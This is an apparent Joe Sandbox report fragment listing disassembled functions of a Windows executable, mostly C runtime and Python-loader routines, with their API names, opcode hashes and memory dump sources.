                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                                                                                                                      • Instruction ID: 83fa90cfd8c71e74b13d55bcc48a617426c8c0bf2705065cbd80c80d8286db5e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5C1B2229087CBA1F778AB1594402FDA764EB81B80F954331EA7E037E1CE7CE95583A0
                                                                                                                                                                                                      Function 00007FF7FF586350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                      • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                      • Instruction ID: f91ec75b9c3450c0b2a59517a70b53743fc71900d43145115887b6c67efab9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F415261A19AC791EB11FB21E4582E9A365FB44344FD00232EA7D436D6EF3CE615C7E0
                                                                                                                                                                                                      Function 00007FF7FF595698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                      • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                      • Instruction ID: ec10dbd66422ca27fc0225f291d354a09a4ba7456042b811a98854b9adaadf99
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74419622D187C283E768AB2095503B9A3A0FB94794F509335E67C03ED1DF7CA5F187A0
                                                                                                                                                                                                      Function 00007FF7FF58CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                      • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                      • Instruction ID: ca1fae4b14fc585a347e055649a00323b0caa5b68d0e0ecf03e974bd0acde9c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD313760E096C351FB24BB2594653F9AB92BF41784FC44634D97E4B2D3EE2CA409C2F0
                                                                                                                                                                                                      Function 00007FF7FF599AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                      • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                      • Instruction ID: db12c1a4249d1ec308ab5f48d1858cd141796b67297f7cd5fbbcd5117e5a6e2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29D09E10F097C652EB283F705C990F8A651AF48745F941638C83B073E3ED6CA45943E0
                                                                                                                                                                                                      Function 00007FF7FF5901AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                      • Instruction ID: 0951bbb32cb433a8f0e7dd39feeb2b44c16743efb6b602f6ce011d5190385592
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0451E321B092D286FB7CAA7594006FAE691AF44BA4F984B34DE7C437C5CF3CE40586A0
                                                                                                                                                                                                      Function 00007FF7FF59C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                      • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                      • Instruction ID: 7c911afd9b13035e3bb5ab13be8b67c065dd9d35f6a1949ead0e784c2689afca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E3A1B18AC281DB24AB25A8441A9E761FB45BF4F944331EE7E4B7E9CF7CD0118790
                                                                                                                                                                                                      Function 00007FF7FF59A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                      • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                      • Instruction ID: 8def72dcd44552952c8c5b4efc295f34883e1e8278225513b2ff387a4d26758e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE04F10E0968252FF287BF294951B996506F85740B854230C83D832E2DE2C689582F0
                                                                                                                                                                                                      Function 00007FF7FF59ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC36
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC40
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                      • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                      • Instruction ID: 71b7341e872857e837700a200d64cfe775ea603b681a6c97d05e0d0b5d33e6f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21A411B1C6C241EFB877A194902F9A2829F84790FD84375E93E4B7D2CE6CE44583F0
                                                                                                                                                                                                      Function 00007FF7FF59BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                      • Instruction ID: 86453121177c381cf5bc730092f354509d3598680ca3531b394511a52951a636
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD41D73290868687FB38AB16A5442BDB7A4EB55B44F901331D6BE436D1CF2DE502CBF1
                                                                                                                                                                                                      Function 00007FF7FF587F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                      • Opcode ID: 0fb7cb8cbc48f9e917e8c39a654de37bb9aab67e22ead0d73b96efd71e61a230
                                                                                                                                                                                                      • Instruction ID: 0ef530b5c66d8333b0de49c4743448113597bf5d41f0ae2a2c35713b507af1c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fb7cb8cbc48f9e917e8c39a654de37bb9aab67e22ead0d73b96efd71e61a230
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7219E21B486D285EB64BA2269043FAEA51FF45BD4FC85530EE3D0B7C6CE3DE045C6A4
                                                                                                                                                                                                      Function 00007FF7FF59B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                      • Instruction ID: 4db6ddd0342bbc456bf5ac2bef59305e82959790f2699d77c2fcfc09f1e02d68
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC319C31A186C695F7697B5588813FCA660AB40B94FC64335E93D033E2CFBCE94187B0
                                                                                                                                                                                                      Function 00007FF7FF5999D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                      • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                      • Instruction ID: 77e3f25fc3631df90c6934c1dd0cc6b5953e21149806ae3f2f42af8d86b9aa42
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23218E72A057828AEB28AF64C4442EC77A5FB44718F841739D63D07AD5DF38D984C7A0
                                                                                                                                                                                                      Function 00007FF7FF596004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                      • Instruction ID: ea438a866be39f56569a56d08e4e1f71a6e21f40d625983e6fb0b0e994b4ef63
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81113062A1868241EB78BF5194002FEE2A4AF45F90FC44231EB7C57AD6DF3DD45187E1
                                                                                                                                                                                                      Function 00007FF7FF5A63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
